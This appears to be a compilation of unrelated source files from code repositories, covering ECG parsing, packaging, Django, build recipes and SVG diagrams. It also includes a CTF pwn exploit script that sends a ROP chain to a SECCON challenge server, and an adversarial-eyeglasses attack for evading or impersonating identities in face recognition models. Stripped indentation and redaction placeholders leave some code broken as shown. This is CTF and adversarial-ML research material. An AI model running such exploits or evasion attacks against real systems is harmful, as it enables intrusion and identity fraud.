output_rows, leads = parse(path)
if output_image_folder is not None:
ecg_plot.plot(np.array(leads), sample_rate=500, title='12-Lead ECG', columns=1)
ecg_plot.save_as_png(f"{output_image_folder}/{filename.replace('.xml', '')}")
return output_rows, leads, filename
def main(args):
input_folder = args.input_folder
output_file = args.output_file
output_numpy = args.output_numpy
output_image_folder = args.output_image_folder
if output_image_folder is not None:
Path(output_image_folder).mkdir(parents=True, exist_ok=True)
with open(output_file, 'w') as csvfile:
csvwriter = csv.writer(csvfile, delimiter=',', quotechar='"', quoting=csv.QUOTE_MINIMAL)
csvwriter.writerow(["input_file_name", "date", "time", "dateofbirth", "sex", "mrn", "csn", "meanqrsdur", "meanprint", "heartrate", "rrint", "pdur", "qonset", "tonset", "qtint", "qtcb", "qtcf", "QTcFM", "QTcH", "pfrontaxis", "i40frontaxis", "qrsfrontaxis", "stfrontaxis", "tfrontaxis", "phorizaxis", "i40horizaxis", "t40horizaxis", "qrshorizaxis", "sthorizaxis", "severity", "statements"])
fs = []
with futures.ProcessPoolExecutor(4) as executor:
for filename in os.listdir(input_folder):
if filename.endswith(".xml"):
future = executor.submit(call_parse, [filename, os.path.join(input_folder, filename), output_image_folder])
fs.append(future)
overall_processed_leads = []
for future in tqdm(futures.as_completed(fs), total=len(fs)):
output_rows, processed_leads, filename = future.result(timeout=60)
for output_row in output_rows:
csvwriter.writerow([filename] + output_row)
if output_numpy is not None:
overall_processed_leads.append(processed_leads)
if output_numpy is not None:
np.save(output_numpy, np.array(overall_processed_leads))
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Parses the PhilipsECG format and writes out the data to a CSV file and saves the 12-lead ECG waveforms as a single large NumPy array')
parser.add_argument('-i', '--input-folder',
required=True,
help='ECG XML folder')
parser.add_argument('-o', '--output-file',
required=True,
help='The path to the output summary file')
parser.add_argument('-n', '--output-numpy',
required=False,
help='The path to the output NumPy file')
parser.add_argument('-m', '--output-image-folder',
required=False,
help='The path to the output PNG folder')
args = parser.parse_args()
main(args)
| 3,491 |
setup.py
|
valq7711/websaw
| 1 |
2169829
|
import re
from setuptools import setup
def get_module_var(varname):
regex = re.compile(fr"^{varname}\s*\=\s*['\"](.+?)['\"]", re.M)
mobj = next(regex.finditer(open("websaw/__init__.py").read()))
return mobj.groups()[0]
__author__ = get_module_var('__author__')
__license__ = get_module_var('__license__')
__version__ = get_module_var('__version__')
setup(
name="websaw",
version=__version__,
url="https://github.com/valq7711/websaw",
license=__license__,
author=__author__,
author_email="<EMAIL>",
maintainer=__author__,
maintainer_email="<EMAIL>",
description="websaw - a web framework for rapid development with pleasure",
platforms="any",
keywords='python webapplication',
classifiers=[
"Development Status :: 3 - Alpha",
"Environment :: Web Environment",
"Intended Audience :: Developers",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
"Programming Language :: Python :: 3.7",
"Programming Language :: Python :: 3.8",
"Programming Language :: Python :: 3.9",
"Topic :: Internet :: WWW/HTTP :: HTTP Servers",
"Topic :: Software Development :: Libraries :: Python Modules",
],
install_requires=[
"ombott",
"click",
"gunicorn",
"gevent",
"tornado",
"rocket3",
"threadsafevariable",
"pydal",
"pyjwt",
"yatl",
"requests",
"watchgod",
"renoir",
],
python_requires='>=3.7',
packages=['websaw', 'websaw.core', 'websaw.fixtures'],
)
| 1,632 |
digital_attack.py
|
yuhaoooo/agns-pytorch
| 0 |
2169544
|
'''
Digital attack using accessories
'''
import sys
import torch
import argparse
from module.discriminator import Discriminator
from module.generator import Generator
from module.utils.dataset import EyeGlasses, Crop
from torchvision import transforms
from torch.utils.data import DataLoader
from torch import optim
import torch.autograd as autograd
from torchvision.utils import save_image
from util import load_img, wear_eyeglasses, calc_loss
from module.target import FaceNet, ArcFace, CosFace
def main(args):
# ===========================
# Hyper parameters settings #
# ===========================
batch_size = args.batch_size
epochs = args.epochs
sample_interval = args.interval
device = 'cpu' if args.no_cuda else 'cuda:0'
lr = args.lr
pretrained_epochs = args.pretrained_epochs
classnum = 35
target_model = None
img_size = None
mode = args.mode
target = args.target
kappa = args.kappa
save_path = args.save_path
# ======================
    # Summary Information #
# ======================
print('# ===========================')
    print('# Summary Information')
print('# The attacked model [{}]'.format(args.target_model))
print('# The target class [{}]'.format(args.target))
print('# The attack mode [{}]'.format(args.mode))
print('# ===========================')
# ===========================
# Preparing datasets #
# ===========================
# loading eyeglasses dataset
eyeglasses = args.eyeglasses
trans = transforms.Compose([
Crop(25, 53, 176, 64),
transforms.ToTensor(),
transforms.Normalize([0.5, 0.5, 0.5], [0.5, 0.5, 0.5])
])
# loading attacker's images and eyeglasses mask
attacker_img = load_img(args.attacker, 224).to(device)
mask_img = load_img(args.mask, 224).to(device)
# ===========================
# Loading pretrained models #
# ===========================
# generator
gen = Generator().to(device)
pretrained_model = r'model\gen_{}.pt'.format(pretrained_epochs)
gen.load_state_dict(torch.load(pretrained_model))
optimizer_g = optim.Adam(gen.parameters(), lr=lr, betas=(0.5, 0.999))
# discriminator
disc = Discriminator().to(device)
pretrained_model = r'model\disc_{}.pt'.format(pretrained_epochs)
disc.load_state_dict(torch.load(pretrained_model))
optimizer_d = optim.Adam(disc.parameters(), lr=lr, betas=(0.5, 0.999))
# target model
if args.target_model == 'FaceNet':
target_model = FaceNet(device, classnum, r'model\finetuned_facenet.pt')
img_size = (160, 160)
elif args.target_model == 'CosFace':
target_model = CosFace(device, classnum, r'model\finetuned_cosface.pt')
img_size = (112, 96)
elif args.target_model == 'ArcFace':
target_model = ArcFace(device, classnum, r'model\finetuned_arcface.pt')
img_size = (112, 112)
else:
raise Exception(
'The target model [{}] is not defined!'.format(args.target_model))
# Loss function
adversarial_loss = torch.nn.BCELoss()
dataset = EyeGlasses(eyeglasses, trans)
loader = DataLoader(dataset, batch_size=batch_size, shuffle=True)
for epoch in range(epochs):
for idx, batch in enumerate(loader):
batch_size = batch.shape[0]
batch = batch.to(device)
# adversarial ground truths
valid = torch.ones((batch_size, 1), dtype=torch.float32).to(device) * 0.9
fake = torch.zeros((batch_size, 1), dtype=torch.float32).to(device)
# ==========================
# train generator #
# ==========================
for p in disc.parameters():
p.requires_grad = False
optimizer_g.zero_grad()
noise = torch.FloatTensor(
batch_size, 25).uniform_(-1.0, 1.0).to(device)
z = autograd.Variable(noise.data, requires_grad=True)
# discriminative loss
fake_images = gen(z)
g_loss = adversarial_loss(disc(fake_images), valid)
grads_disc_loss = autograd.grad(g_loss, gen.parameters(), retain_graph=True)
# attack loss
worn_imgs = wear_eyeglasses(fake_images, attacker_img, mask_img)
clf_loss, prob, _ = calc_loss(
target_model, worn_imgs, target, img_size, mode)
grads_clf_loss = autograd.grad(-1.0 * clf_loss, gen.parameters(), retain_graph=False)
# update generator parameters gradients
for i, p in enumerate(gen.parameters()):
grad_1 = grads_disc_loss[i]
grad_2 = grads_clf_loss[i]
if torch.norm(grad_1, p=2) > torch.norm(grad_2, p=2):
grad_1 = grad_1 * torch.norm(grad_2, p=2) / torch.norm(grad_1, p=2)
else:
grad_2 = grad_2 * torch.norm(grad_1, p=2) / torch.norm(grad_2, p=2)
p.grad = (kappa * grad_1 + kappa * grad_2).clone()
optimizer_g.step()
# ==========================
# train discriminator #
# ==========================
for p in disc.parameters():
p.requires_grad = True
optimizer_d.zero_grad()
fake_images = autograd.Variable(
fake_images.data, requires_grad=True)
real_loss = adversarial_loss(disc(batch), valid)
fake_loss = adversarial_loss(disc(fake_images), fake)
d_loss = (fake_loss + real_loss) / 2.0
d_loss.backward()
optimizer_d.step()
if idx % 50 == 0:
print("[Epoch %d/%d] [Batch %d/%d] [D loss: %f] [Prob: %f] [Disc: %f]"
% (epoch, epochs, idx, len(loader), d_loss.item(), prob.item(), g_loss.item()))
batches_done = epoch * len(loader) + idx
if batches_done % sample_interval == 0:
save_image(worn_imgs.data[:25], "logs/%d.png" %
batches_done, nrow=5, normalize=False)
torch.save(gen.state_dict(), r'{}\gen_{}.pt'.format(save_path, epochs))
torch.save(disc.state_dict(), r'{}\disc_{}.pt'.format(save_path, epochs))
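# --- Illustrative sketch (not part of the original training loop) -----------
# The gradient balancing used above, shown in isolation: the larger of the two
# gradients is scaled down to the norm of the smaller one, then both are mixed
# with weight kappa. The tensor arguments here are hypothetical.
def _balance_and_mix(grad_1, grad_2, kappa):
    n1 = torch.norm(grad_1, p=2)
    n2 = torch.norm(grad_2, p=2)
    if n1 > n2:
        grad_1 = grad_1 * n2 / n1
    else:
        grad_2 = grad_2 * n1 / n2
    return kappa * grad_1 + kappa * grad_2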
def parse(argv):
    parser = argparse.ArgumentParser('Digital attack using accessories.')
parser.add_argument('--batch_size', type=int, default=32,
help='input batch size for training (default: 32)')
parser.add_argument('--epochs', type=int, default=1,
help='number of epochs to train (default: 1)')
parser.add_argument('--lr', type=float, default=5e-5,
help='learning rate (default: 5e-5)')
parser.add_argument('--no_cuda', action='store_true',
default=False, help='disables CUDA training')
parser.add_argument('--interval', type=int, default=50,
help='how many batches to wait before printing')
parser.add_argument('--mode', type=str, default='dodge',
help='mode (dodge or impersonate) of attacking face recognition system (default: dodge)')
parser.add_argument('--target', type=int, default=0,
help='face-id of choosen victim (default: 0)')
parser.add_argument('--target_model', type=str, default='FaceNet',
help='attacked face recognition model (FaceNet, CosFace, ArcFace, default: FaceNet)')
# dataset setting
parser.add_argument('--eyeglasses', type=str,
default=r'data\eyeglasses', help='training eyeglasses dataset')
parser.add_argument(
'--mask', type=str, default=r'data\eyeglasses_mask_6percent.png', help='path of eyeglasses mask')
parser.add_argument('--attacker', type=str,
default=r'data\digital\19.jpg', help='the picture of attacker')
    # params setting
parser.add_argument('--kappa', type=float, default=0.25,
help='weight of generator\'s loss function')
# pretrained model
parser.add_argument('--pretrained_epochs', type=int,
default=200, help='number of epochs of trained model')
parser.add_argument('--save_path', type=str,
default='save', help='path to save trained model')
return parser.parse_args(argv)
if __name__ == "__main__":
args = parse(sys.argv[1:])
main(args)
| 8,697 |
product/migrations/0012_auto_20180827_1748.py
|
Nosaiba1/Avocado-Ecommerce
| 0 |
2170377
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11 on 2018-08-27 17:48
from __future__ import unicode_literals
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('product', '0011_auto_20180808_1509'),
]
operations = [
migrations.RemoveField(
model_name='favorite',
name='product',
),
migrations.RemoveField(
model_name='product',
name='is_favourite_value',
),
migrations.DeleteModel(
name='Favorite',
),
]
| 582 |
Gathered CTF writeups/ptr-yudai-writeups/2019/SECCON_CTF_2019_Quals/lazy/listing.py
|
mihaid-b/CyberSakura
| 1 |
2169256
|
from ptrlib import *
elf = ELF("./lazy")
#sock = Process("./lazy")
sock = Socket("lazy.chal.seccon.jp", 33333)
def login_user(username):
sock.sendlineafter("Exit\n", "2")
sock.sendlineafter(": ", username)
sock.recvuntil(", ")
sock.recvline()
output = sock.recvline()
return output
def login_pass(password):
sock.sendlineafter(": ", password)
return
rop_pop_rdi = 0x004015f3
rop_pop_rsi_r15 = 0x004015f1
rop_popper = 0x4015e6
rop_csu_init = 0x4015d0
# leak flag
username = b'A' * (0x5f + 0x58)
login_user(username)
password = b'<PASSWORD>'
password += b'A' * (0x20 - len(password))
password += b'_<PASSWORD>'
password += b'A' * (0x40 - len(password))
password += b'<PASSWORD>'
password += b'A' * (0x60 - len(password))
password += b'_<PASSWORD>'
password += b'A' * (0x80 - len(password))
password += p64(0xdeadbeef)
password += p64(rop_popper)
password += p64(0)
password += p64(0)
password += p64(1)
password += p64(elf.got("read"))
password += p64(0x40)
password += p64(elf.section('.bss') + 0x200)
password += p64(0)
password += p64(rop_csu_init)
password += p64(0) * 2
password += p64(elf.section('.bss') + 0x800)
password += p64(0) * 4
password += <PASSWORD>(<PASSWORD>)
password += p64(elf.section('.bss') + 0x200)
password += <PASSWORD>(<PASSWORD>)
login_pass(password)
sock.send("/home/lazy/")
for i in range(10):
print(sock.recvline())
sock.interactive()
| 1,407 |
pythonforandroid/recipes/libogg/__init__.py
|
lstwzd/python-for-android
| 4 |
2170359
|
from pythonforandroid.recipe import NDKRecipe
from pythonforandroid.toolchain import current_directory, shprint
from os.path import join
import sh
class OggRecipe(NDKRecipe):
version = '1.3.3'
url = 'http://downloads.xiph.org/releases/ogg/libogg-{version}.tar.gz'
generated_libraries = ['libogg.so']
def build_arch(self, arch):
with current_directory(self.get_build_dir(arch.arch)):
env = self.get_recipe_env(arch)
flags = [
'--with-sysroot=' + self.ctx.ndk_platform,
'--host=' + arch.toolchain_prefix,
]
configure = sh.Command('./configure')
shprint(configure, *flags, _env=env)
shprint(sh.make, _env=env)
self.install_libs(arch, join('src', '.libs', 'libogg.so'))
recipe = OggRecipe()
| 833 |
teamcat_service/docker_build/target/one_step_build/teamcat/doraemon/home/viewmodels/vm_webapps.py
|
zhangyin2088/Teamcat
| 6 |
2169156
|
#coding=utf-8
'''
Created on 2015-11-27
@author: zhangtiande
'''
class VM_Webapps(object):
'''
classdocs
'''
def __init__(self,webapp,login_user):
'''
Constructor
'''
self.user=login_user
self.webapp=webapp
def is_public(self):
result=False
if self.webapp.app_visable_level==1:
result=True
return result
| 417 |
rxmarbles/generator.py
|
enbandari/rx-marbles
| 0 |
2170682
|
from __future__ import print_function
from pyparsing import *
from .svgshapes import *
import sys
import argparse
import math
import importlib
import html
import hashlib
start_character = "+"
nop_event_character = '-'
completion_symbol = "|"
error_character = "#"
infinity_character = ">"
colon = Suppress(":")
comment_start = "//"
nop_event = Word(nop_event_character, exact=1)
# our marble can be either single alphanumeric character, or multiple characters surrounded by ()
marble_text = alphanums
start_symbol = Suppress(start_character)
simple_marble = Word(marble_text, exact=1)
bracked_marble = Suppress("(") + Word(alphanums + "'\"._-") + Suppress(")")
groupped_marble = Combine("{" + Word(marble_text + ",") + "}")
marble = Or([simple_marble, bracked_marble , groupped_marble])
end = Or([completion_symbol, error_character, infinity_character]).setResultsName('end')
timeline_name = Or([QuotedString(quoteChar='"'), Word(alphanums + ",./<>?;'\"[]\{}|`~!@#$%^&*()-=_+")]).setResultsName('name')
source_keyword = "source"
operator_keyword = "operator"
event = Or([nop_event, marble])
events = Group(ZeroOrMore(event)).setResultsName('events')
padding = Optional(Word('.')).setResultsName('padding')
events_sequence = Group(padding + start_symbol + events + end).setResultsName('events_sequence', True)
skewed_group = Suppress("{") + OneOrMore(events_sequence) + Suppress("}")
type = Or([source_keyword, operator_keyword]).setResultsName('type')
source_or_operator = Group(type + timeline_name + colon + Or([events_sequence, skewed_group]))
marble_diagram_keyword = "marble"
marble_diagram_body = OneOrMore(source_or_operator)
marble_diagram_name = Word(alphanums + "_").setResultsName("diagram_name")
marble_diagram = Group(Suppress(marble_diagram_keyword) + marble_diagram_name + Suppress("{") + marble_diagram_body + Suppress("}"))
marble_diagrams = OneOrMore(marble_diagram)
marble_diagrams.ignore(comment_start + restOfLine)
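# --- Illustrative sketch (not part of the original module) ------------------
# A minimal diagram in the DSL defined by the grammar above, assuming the
# syntax built from the '+' start symbol, '-' nop events, single-character
# marbles and the '|' completion symbol. The parse call is left commented out.
_example_diagram = '''
marble map_example {
    source "numbers":        +--1--2--3--|
    operator "map(x * 10)":  +--a--b--c--|
}
'''
# marble_diagrams.parseString(_example_diagram)  # hypothetical usage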
def create_id_string(name):
return hashlib.md5(name.encode("utf-8")).hexdigest()
class Timeline:
def __init__(self, parsed_list, theme):
self.theme = theme
self.type = parsed_list.type
self.name = parsed_list.name
self.timelines = parsed_list.events_sequence
self.rotation_deg = 0
if len(self.timelines) > 1:
self.rotation_deg = 15
max_index = max(map(lambda x: 2 + len(x.events) + len(x.padding), self.timelines))
# this is used as distance on flat axis between two time events
self.base_thick_width = 50.0
        # this is used as distance on the skewed axis between two time events
self.tick_width = self.base_thick_width / math.cos(self.rotation_deg * math.pi / 180.0)
self.width = self.tick_width * max_index
self.top_margin = 30
self.total_height = 0
def create_groupped_symbol(self, o, x_offset, coloring):
# Sub-parsing groupped marble
ungroupped_marble = Suppress("{") + Word(marble_text) + ZeroOrMore(Suppress(",") + Word(marble_text)) + Suppress("}")
subitems = ungroupped_marble.parseString(o)
step_width = 1.0 * self.base_thick_width
body = ", ".join(map(lambda x: str(x), subitems))
width = step_width * len(subitems)
groupped_symbol = Struct(self.theme, x_offset, body, coloring, width, subitems, step_width)
return groupped_symbol
def __get_timeline_shapes(self, coloring, timeline_items):
# adding events
theme = self.theme
self.end = timeline_items.end
x_offset = 0
global parseString
for o in timeline_items.events:
if o.startswith('{') and o.endswith('}'):
groupped_symbol = self.create_groupped_symbol(o, x_offset, coloring)
self.symbols.append(groupped_symbol)
elif o != nop_event_character:
self.symbols.append(Marble(theme, x_offset, 0, o, coloring))
x_offset += self.tick_width
# adding completion, error or infinity_character symbol to the axis
if self.end == completion_symbol:
self.symbols.append(Terminate(theme, x_offset))
elif self.end == error_character:
self.symbols.append(Error(theme, x_offset))
# adding time axis
self.symbols.insert(0, Axis(theme, 0, x_offset + 2 * self.base_thick_width))
def get_svg(self, y, coloring, max_length):
svg = ""
yy = y + self.top_margin
for timeline_items in self.timelines:
self.symbols = []
self.__get_timeline_shapes(coloring, timeline_items)
x_offset = self.base_thick_width * len(timeline_items.padding)
g_id = self.type + "_" + create_id_string(self.name)
rot_yy = yy
svg += '<g id="%s" transform="rotate(%s %s %s) translate(%s,%s)">' % (g_id, self.rotation_deg, x_offset, rot_yy , x_offset, yy)
for obj in self.symbols:
svg += obj.get_shape()
h = obj.get_height()
if self.total_height < h + self.top_margin :
self.total_height = h + self.top_margin
svg += '</g>'
# and finally - inserting an extra axis - only when we are in the skewed block mode
if len(self.timelines) > 1:
max_padding = max(map(lambda x: len(x.padding), self.timelines))
a = Axis(self.theme, 0, self.base_thick_width * (4 + max_padding))
axisSvg = '<g id="skew" transform="translate(0 %s)">%s</g>' % (yy, a.get_shape())
svg = axisSvg + svg
return svg
def height(self):
"returns height in pixels. This must be called after get_svg()"
# let's calculate all bounding boxes
max_height = 0
for events_sequence in self.timelines:
timeline_width = self.base_thick_width * (1 + len(events_sequence.events))
timeline_height = self.total_height
bb = (timeline_width, timeline_height)
# width of the diagonal
diag = math.sqrt(bb[0] * bb[0] + bb[1] * bb[1])
alpha_rad = math.atan2(bb[1], bb[0])
alpha_deg = alpha_rad * 180.0 / math.pi
# after rotation
beta_deg = alpha_deg + self.rotation_deg
beta_rad = beta_deg * math.pi / 180.0
height = diag * math.sin(beta_rad)
if max_height < height:
max_height = height
return max_height
class Source(Timeline):
def __init__(self, parsed_list, theme):
Timeline.__init__(self, parsed_list, theme)
class Operator:
def __init__(self, parsed_list, theme):
self.theme = theme
self.timeline = Timeline(parsed_list, theme)
self.name = parsed_list.name
self.width = self.timeline.width
self.box_height = 80
self.top_margin = 10
def height(self):
"height in pixels"
return self.box_height + self.timeline.height() + 2 * self.top_margin
def get_svg(self, y, coloring, max_length):
theme = self.theme
box_y = y + self.top_margin
box = OperatorBox(theme, max_length, self.box_height, html.escape(self.name))
svg = '<g transform="translate(0 %s)">' % box_y
svg += box.get_shape() + self.timeline.get_svg(0 + self.box_height + self.top_margin, coloring, max_length)
svg += '</g>'
return svg
# ---------------------------------------------------
# events_sequence elements
# ---------------------------------------------------
def get_objects(parse_result, theme):
global source_keyword
global operator_keyword
result = []
for line in parse_result:
type = line[0]
if type == operator_keyword:
t = Operator(line, theme)
elif type == source_keyword:
t = Source(line, theme)
else:
raise Exception("unsupported type")
result.append(t)
return result
# other colouring schemes can be added here
palettes = {'default': ["#ffcc00", "#48b3cd", "#ffaacc", "#e5ff7c", "#ececec", "#a4ecff", "#ff6600", "#a0c800", "#ff3a3a", "#afafe9", "#db7c7c", "#80ffe6"]}
class Coloring:
    'This object is a stateful color provider for each marble'
def __init__(self, paletteName='default'):
global palettes
self.color_palette = palettes[paletteName]
self.colormap = {}
self.index = 0
def get_color_for(self, marbleId):
if not marbleId in self.colormap:
self.colormap[marbleId] = self.color_palette[self.index]
self.index += 1
if self.index >= len(self.color_palette):
self.index = 0
return self.colormap[marbleId]
class SvgDocument:
def __init__(self, row_objects, theme, scale):
self.theme = theme
self.scale = scale
self.coloring = Coloring()
self.row_objects = row_objects
# in pixels
self.max_row_width = max(map(lambda row: row.width, self.row_objects))
def get_document(self):
theme = self.theme
scale = self.scale
body = ""
y = 0
for row in self.row_objects:
body += row.get_svg(y, self.coloring, self.max_row_width)
y = y + row.height()
r = Root(theme, body, self.max_row_width, y, scale / 100.0)
return r.node
| 9,411 |
BACKEND-DJANGO/ratings/urls.py
|
CheboiDerrick/web-score
| 0 |
2170280
|
"""ratings URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/3.2/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path, include
from django.conf import settings
from rest_framework.routers import DefaultRouter
from posts.views import ProjectViewSet, ProfileViewSet
from django.conf.urls.static import static
router = DefaultRouter()
router.register(r'api/v1/profile', ProfileViewSet, basename='Profile')
router.register(r'api/v1/projects', ProjectViewSet, basename='Project')
urlpatterns = [
path('admin/', admin.site.urls),
path('api/v1/', include('auth.urls')),
path('', include(router.urls)),
]
if settings.DEBUG:
urlpatterns += static(settings.MEDIA_URL,
document_root=settings.MEDIA_ROOT)
| 1,315 |
ABC/abc101-abc150/abc118/b.py
|
KATO-Hiro/AtCoder
| 2 |
2168234
|
# -*- coding: utf-8 -*-
def main():
n, m = map(int, input().split())
    ans = [0 for _ in range(m)]  # one counter per food
for i in range(n):
ka = list(map(int, input().split()))
for j in ka[1:]:
ans[j - 1] += 1
result = 0
for a in ans:
if a == n:
result += 1
print(result)
if __name__ == '__main__':
main()
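# --- Illustrative example (not from the original submission) ----------------
# With hypothetical input
#   3 4
#   2 1 3
#   3 1 2 3
#   2 3 2
# only food 3 is liked by all n = 3 people, so the program prints 1.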
| 392 |
game/migrations/0010_auto_20200828_1951.py
|
atadams/bbstuff
| 0 |
2170822
|
# Generated by Django 3.1 on 2020-08-29 00:51
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('game', '0009_auto_20200825_1117'),
]
operations = [
migrations.AddField(
model_name='team',
name='primary_color_hex',
field=models.CharField(blank=True, max_length=10),
),
migrations.AddField(
model_name='team',
name='secondary_color_hex',
field=models.CharField(blank=True, max_length=10),
),
migrations.AddField(
model_name='team',
name='tertiary_color_hex',
field=models.CharField(blank=True, max_length=10),
),
]
| 747 |
vim.d/vimfiles/bundle/taghighlight/plugin/TagHighlight/module/loaddata.py
|
lougxing/gbox
| 0 |
2170691
|
# Tag Highlighter:
# Author: <NAME> <abudden _at_ gmail _dot_ com>
# Copyright: Copyright (C) 2009-2013 <NAME>
# Permission is hereby granted to use and distribute this code,
# with or without modifications, provided that this copyright
# notice is copied with it. Like anything else that's free,
# the TagHighlight plugin is provided *as is* and comes with no
# warranty of any kind, either expressed or implied. By using
# this plugin, you agree that in no event will the copyright
# holder be liable for any damages resulting from the use
# of this software.
# ---------------------------------------------------------------------
from __future__ import print_function
import os
import glob
import re
try:
from .debug import Debug
except ValueError:
def Debug(text, level):
print(text)
data_directory = None
leadingTabRE = re.compile(r'^\t*')
includeRE = re.compile(r'^%INCLUDE (?P<filename>.*)$')
envRE = re.compile(r'\$\{(?P<envname>[A-Za-z0-9_]+)\}')
def SetLoadDataDirectory(directory):
global data_directory
data_directory = directory
def EntrySplit(entry, pattern):
result = []
parts = entry.strip().split(pattern, 1)
if len(parts) == 1:
result = parts
elif ',' in parts[1]:
result = [parts[0], parts[1].split(',')]
else:
result = parts
return result
def ParseEntries(entries, indent_level=0):
index = 0
while index < len(entries):
line = entries[index].rstrip()
m = leadingTabRE.match(line)
this_indent_level = len(m.group(0))
unindented = line[this_indent_level:]
if len(line.strip()) == 0:
# Empty line
pass
elif line.lstrip()[0] == '#':
# Comment
pass
elif this_indent_level < indent_level:
return {'Index': index, 'Result': result}
elif this_indent_level == indent_level:
if ':' in unindented:
parts = EntrySplit(unindented, ':')
key = parts[0]
try:
result
except NameError:
result = {}
if not isinstance(result, dict):
raise TypeError("Dictionary/List mismatch in '%s'" % key)
if len(parts) > 1:
result[key] = parts[1]
else:
try:
result
except NameError:
result = []
if not isinstance(result, list):
raise TypeError("Dictionary/List mismatch: %r" % result)
result += [unindented]
else:
sublist = entries[index:]
subindent = indent_level+1
parsed = ParseEntries(sublist, subindent)
try:
result
except NameError:
result = {}
if key in result and isinstance(result[key], dict) and isinstance(parsed['Result'], dict):
                # merge nested dictionaries (dict.items() cannot be added with + on Python 3)
                merged = dict(result[key])
                merged.update(parsed['Result'])
                result[key] = merged
else:
result[key] = parsed['Result']
index += parsed['Index'] - 1
index += 1
try:
result
except NameError:
result = {}
return {'Index': index, 'Result': result}
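# --- Illustrative sketch (not part of the original plugin) ------------------
# Hand-written entries fed straight to ParseEntries() to show the structure it
# builds: "key:value" lines become dict entries and tab-indented lines become
# nested lists/dicts. The keys below are made up for demonstration only.
def _demo_parse_entries():
    example = [
        "Language:python\n",
        "Extensions:\n",
        "\tpy\n",
        "\tpyw\n",
    ]
    # expected to yield roughly {'Language': 'python', 'Extensions': ['py', 'pyw']}
    return ParseEntries(example)['Result']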
def LoadFile(filename):
fh = open(filename, 'r')
entries = fh.readlines()
index = 0
while index < len(entries):
m = includeRE.match(entries[index])
if m is not None:
# Include line
inc_file = m.group('filename').strip()
e = envRE.search(inc_file)
try:
while e is not None:
inc_file = inc_file[:e.start()] + \
os.environ[e.group('envname')] + \
inc_file[e.end():]
e = envRE.search(inc_file)
except KeyError:
raise
pass
if os.path.exists(inc_file):
fhinc = open(inc_file, 'r')
extra_entries = fhinc.readlines()
fhinc.close()
entries = entries[:index] + extra_entries + entries[index+1:]
else:
Debug("No such file: '%s'" % inc_file, "Warning")
index += 1
fh.close()
return ParseEntries(entries)['Result']
def LoadDataFile(relative):
filename = os.path.join(data_directory,relative)
return LoadFile(filename)
def GlobData(matcher):
files = glob.glob(os.path.join(data_directory, matcher))
return [os.path.relpath(i,data_directory) for i in files]
if __name__ == "__main__":
import pprint
pprint.pprint(LoadFile('testfile.txt'))
| 4,796 |
Web/demos/read_frames_fast.py
|
parvatijay2901/FaceNet_FR
| 6 |
2168950
|
# Modified from:
# https://www.pyimagesearch.com/2017/02/06/faster-video-file-fps-with-cv2-videocapture-and-opencv/
# Performance:
# Python 2.7: 105.78 --> 131.75
# Python 3.7: 15.36 --> 50.13
# USAGE
# python read_frames_fast.py --video videos/jurassic_park_intro.mp4
# import the necessary packages
from imutils.video import FileVideoStream
from imutils.video import FPS
import numpy as np
import argparse
import imutils
import time
import cv2
def filterFrame(frame):
frame = imutils.resize(frame, width=450)
frame = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
frame = np.dstack([frame, frame, frame])
return frame
# construct the argument parse and parse the arguments
ap = argparse.ArgumentParser()
ap.add_argument("-v", "--video", required=True,
help="path to input video file")
args = vars(ap.parse_args())
# start the file video stream thread and allow the buffer to
# start to fill
print("[INFO] starting video file thread...")
fvs = FileVideoStream(args["video"], transform=filterFrame).start()
time.sleep(1.0)
# start the FPS timer
fps = FPS().start()
# loop over frames from the video file stream
while fvs.running():
# grab the frame from the threaded video file stream, resize
# it, and convert it to grayscale (while still retaining 3
# channels)
frame = fvs.read()
# Relocated filtering into producer thread with transform=filterFrame
# Python 2.7: FPS 92.11 -> 131.36
# Python 3.7: FPS 41.44 -> 50.11
#frame = filterFrame(frame)
# display the size of the queue on the frame
cv2.putText(frame, "Queue Size: {}".format(fvs.Q.qsize()),
(10, 30), cv2.FONT_HERSHEY_SIMPLEX, 0.6, (0, 255, 0), 2)
# show the frame and update the FPS counter
cv2.imshow("Frame", frame)
cv2.waitKey(1)
if fvs.Q.qsize() < 2: # If we are low on frames, give time to producer
time.sleep(0.001) # Ensures producer runs now, so 2 is sufficient
fps.update()
# stop the timer and display FPS information
fps.stop()
print("[INFO] elasped time: {:.2f}".format(fps.elapsed()))
print("[INFO] approx. FPS: {:.2f}".format(fps.fps()))
# do a bit of cleanup
cv2.destroyAllWindows()
fvs.stop()
| 2,190 |
ejercicios/ej_26_groupDataFrames.py
|
jorgemauricio/python
| 0 |
2169310
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Mon Jul 17 16:17:25 2017
@author: jorgemauricio
"""
# libraries
import numpy as np
import pandas as pd
from pandas import DataFrame, Series
# create a dataframe
dframe = DataFrame({'k1':['X','X','Y','Y','Z'],
                    'k2':['alpha','beta','alpha','beta','alpha'],
                    'dataset1':np.random.randn(5),
                    'dataset2':np.random.randn(5)})
# display it
dframe
# take the dataset1 column and group it by the k1 key
group1 = dframe['dataset1'].groupby(dframe['k1'])
# display the object
group1
# now we can perform operations on this object
group1.mean()
# we can use the column names to generate the group keys
dframe.groupby('k1').mean()
# or multiple columns
dframe.groupby(['k1','k2']).mean()
# we can get the group sizes with the .size() method
dframe.groupby(['k1']).size()
# we can iterate over the groups
# for example:
for name,group in dframe.groupby('k1'):
    print ("This is the %s group" %name)
    print (group)
    print ('\n')
# using multiple keys
for (k1,k2) , group in dframe.groupby(['k1','k2']):
    print ("Key1 = %s Key2 = %s" %(k1,k2))
    print (group)
    print ('\n')
# a dictionary of the grouped data can be built
group_dict = dict(list(dframe.groupby('k1')))
# display the group with key 'X'
group_dict['X']
| 1,411 |
csv2yaml/__main__.py
|
sepandhaghighi/csv2yaml
| 12 |
2169741
|
# -*- coding: utf-8 -*-
from .csv2yaml import *
import time
import sys
import doctest
import os
